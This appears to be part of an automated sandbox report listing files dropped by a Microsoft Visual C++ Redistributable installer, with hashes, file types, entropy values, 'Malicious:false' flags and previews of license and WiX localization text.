                                                                        MD5:FBF293EE95AFEF818EAF07BB088A1596
                                                                        SHA1:BBA1991BA6459C9F19B235C43A9B781A24324606
                                                                        SHA-256:1FEC058E374C20CB213F53EB3C44392DDFB2CAA1E04B7120FFD3FA7A296C83E2
                                                                        SHA-512:6971F20964EF74B19077EE81F953342DC6D2895A8640EC84855CECCEA5AEB581E6A628BCD3BA97A5D3ACB6CBE7971FDF84EF670BDDF901857C3CD28855212019
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LA LICENCIA DE SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0 Estos t\'e9rminos de licencia constituyen un contrato entre Microsoft Corporation (o, en funci\'f3n de donde resida, una de sus filiales) y usted. Se aplican al software antes mencionado. Los t\'e9rminos tambi\'e9n se aplican a cualquier servicio o actualizaci\'f3n de Microsoft para el software, excepto en la medida que tengan t\'e9rminos diferentes.\par..\b SI USTED CUMPLE CON LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE SE DESCRIBEN A CONTINUACI\'d3N.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):5.0491645049584655
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
                                                                        MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                        SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                        SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                        SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive | /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (591), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):13188
                                                                        Entropy (8bit):3.7277002414324074
                                                                        Encrypted:false
                                                                        SSDEEP:192:X0s1PoDnH5zHqQHG0Hd8Hz7HE06HA0rH3pKp5cxLU71zLG0Lw4cBx7z8NkzzkvQY:X0sN0dLbmnoNEQkxJM4ZVEpPEv
                                                                        MD5:58518543644BAA7BFC6B67B251AF84FF
                                                                        SHA1:97D4538050BB6D1BDE14A918385038E651389E33
                                                                        SHA-256:650B3CC3CDB3630ED9FCF8E5E493E28586B5F7768F5ADC317D884B8184CBE15E
                                                                        SHA-512:A2F2E514A941972E85CDA0DACC154EDF5BBADFD32359FE79203EE28A048E4AD16712078B468515F5CDDA625DFCA3CF5EEFFCE3D3CCFA254841958BC0806B1726
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-16"?>..<BootstrapperApplicationData xmlns="http://schemas.microsoft.com/wix/2010/BootstrapperApplicationData">..  <WixBalCondition Condition="VersionNT64 &gt;= v6.0 OR (VersionNT64 = v5.2 AND ServicePackLevel &gt;= 1)" Message="[WixBundleName] can only be installed on Windows XP SP1 (x64) and newer platforms." />..  <WixBundleProperties DisplayName="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702" LogPathVariable="WixBundleLog" Compressed="ye
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):9046
                                                                        Entropy (8bit):5.157073875669985
                                                                        Encrypted:false
                                                                        SSDEEP:192:W8lZ1UVDWkgWZTIsvPhghtQ1Qf4lCfnEtHixEGx736wHqItfSpOy2:9T15WZMgAYlOnjt5HLoL2
                                                                        MD5:2EABBB391ACB89942396DF5C1CA2BAD8
                                                                        SHA1:182A6F93703549290BCDE92920D37BC1DEC712BB
                                                                        SHA-256:E3156D170014CED8D17A02B3C4FF63237615E5C2A8983B100A78CB1F881D6F38
                                                                        SHA-512:20D656A123A220CD3CA3CCBF61CC58E924B44F1F0A74E70D6850F39CECD101A69BCE73C5ED14018456E022E85B62958F046AA4BD1398AA27303C2E86407C3899
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-363\
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1861
                                                                        Entropy (8bit):6.868587546770907
                                                                        Encrypted:false
                                                                        SSDEEP:24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
                                                                        MD5:D6BD210F227442B3362493D046CEA233
                                                                        SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                        SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                        SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2952
                                                                        Entropy (8bit):5.052095286906672
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
                                                                        MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                        SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                        SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
                                                                        SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8332
                                                                        Entropy (8bit):5.184632608060528
                                                                        Encrypted:false
                                                                        SSDEEP:96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
                                                                        MD5:F62729C6D2540015E072514226C121C7
                                                                        SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                        SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                        SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):195600
                                                                        Entropy (8bit):6.682530937585544
                                                                        Encrypted:false
                                                                        SSDEEP:3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
                                                                        MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                        SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                        SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                        SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18415
                                                                        Entropy (8bit):4.043868285184243
                                                                        Encrypted:false
                                                                        SSDEEP:192:Haz4aHQbC6dBCLCNavmu6OqSPEmmVUJ9etKL5W2cBxGC4iSM0fvJ9seyryH1mqGI:2yk/RF8e7GWU2
                                                                        MD5:2B063D92663595DFE4781AE687A03D86
                                                                        SHA1:0FB582E756DBC751EA380593AC4DA27DDB4EBB06
                                                                        SHA-256:44C76290F7A2E45940E8338912FEB49BCF4E071CFA85D2D34762857743ACBC8D
                                                                        SHA-512:94C8FDA6173C7F5740F206190EDCD1F1F1C309596B710D400E23CD363A619D707A5D4576D4FE63AB7CB68947F009EFD29A1FBE04743A294698BF2AE17E92C214
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 \f1\'88\'cc\'d0\'d0\'eb\'41\'b6\'ce\f0 \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fc\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a1\'a3\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):6.163758160900388
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
                                                                        MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                        SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                        SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                        SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13234
                                                                        Entropy (8bit):5.125368352290407
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3333
                                                                        Entropy (8bit):5.370651462060085
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):12392
                                                                        Entropy (8bit):5.192979871787938
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3379
                                                                        Entropy (8bit):5.094097800535488
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):12349
                                                                        Entropy (8bit):5.108676965693909
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3366
                                                                        Entropy (8bit):5.0912204406356905
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11440
                                                                        Entropy (8bit):5.037988271709582
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3319
                                                                        Entropy (8bit):5.019774955491369
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):30228
                                                                        Entropy (8bit):3.785116198512527
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.955167044943003
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):28393
                                                                        Entropy (8bit):3.874126830110936
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3249
                                                                        Entropy (8bit):5.985100495461761
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13352
                                                                        Entropy (8bit):5.359561719031494
                                                                        Encrypted:false
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3212
                                                                        Entropy (8bit):5.268378763359481
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
                                                                        MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                        SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                        SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                        SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10956
                                                                        Entropy (8bit):5.086757849952268
                                                                        Encrypted:false
                                                                        SSDEEP:192:H2JR4ufWXXFA+YGRjHquAHHoKWCsGlHIpSDDvJRkYhaDznP3l7wLXiBpt32:WJ6ufB+Yc3AnoZCb5AGPQPCLQ72
                                                                        MD5:9A8D2ACF07F3C01E5CBC461AB932D85B
                                                                        SHA1:8781A298DCC14C18C6F6DB58B64F50B2FC6E338E
                                                                        SHA-256:27891EEC899BE859E3B4D3B29247FC6B535D7E836DEF0329111C48741EC6E701
                                                                        SHA-512:A60262A0C18E3BEF7C6D52F242153EBE891F676ED639F2DACFEBBAC86E70EEBF58AA95A7FE1A16E15A553C1BD3ECACCD8677EB9D2761CB79CB9A342C9B4252E2
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3095
                                                                        Entropy (8bit):5.150868216959352
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
                                                                        MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                        SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                        SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                        SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):31981
                                                                        Entropy (8bit):3.6408688850128446
                                                                        Encrypted:false
                                                                        SSDEEP:384:GdkM1I1EqW6aAHmxiTJrN6feZ78C7e5zoPqp007FsrmPx/1JRbnS0Yk4SYdIDtx2:Su4Mtg1S0YkjYWZM
                                                                        MD5:62229BE4447C349DF353C5D56372D64B
                                                                        SHA1:989799ED24913A0E6AE2546EE2A9A8D556E1CB3B
                                                                        SHA-256:1BB3FB55B8A13FA3BAFFFE72F5B1ED8B57A63BD4D8654BB6DC5B9011CE803B44
                                                                        SHA-512:FA366328C3FD4F683FDB1C5A64F5D554DE79620331086E8B4CCC2BFC2595B1FDED02CEC8AA982FCD8B13CC175D222AF2D7E2CD1A33B52F36AFD692B533FDBF13
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4150
                                                                        Entropy (8bit):5.444436038992627
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
                                                                        MD5:17C652452E5EE930A7F1E5E312C17324
                                                                        SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                        SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                        SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13807
                                                                        Entropy (8bit):5.2077828423114045
                                                                        Encrypted:false
                                                                        SSDEEP:192:mfGSPTe1VWjPqkdUxtptACpt4jSzUQBtB7+fzCCnebZ/42W2TEAQjE4oOwuxqrEs:7SK+W6UbACp2SzD9+btebZwZWEdpow2
                                                                        MD5:9625F3A496DBF5E3E0D2F33D417EDBBF
                                                                        SHA1:119376730428812A31B70D58C873866D5307A775
                                                                        SHA-256:F80926604E503697247353F56856B31DE0B3FC1319F1C94068363952549CC9B1
                                                                        SHA-512:DB91A14FC27E3A62324E024DD44E3B5548AF7E1C021201C3D851BD2F32537885AACFC64ADAE619BAC31B60229D1D5FC653F5301CD7187C69BD0ACECCE817D6A3
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3221
                                                                        Entropy (8bit):5.280530692056262
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
                                                                        MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                        SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                        SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                        SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18214
                                                                        Entropy (8bit):3.9837154113926356
                                                                        Encrypted:false
                                                                        SSDEEP:192:Hom4PyAjs/HBJ5qyK3PG4lk5xxKyAW1yW7/Y3OKchGMvGMLdo4+uHq9f4yPxrdCX:IDM1OR5rGU2
                                                                        MD5:D083C7E300928A0C5AEA5ECBD1653836
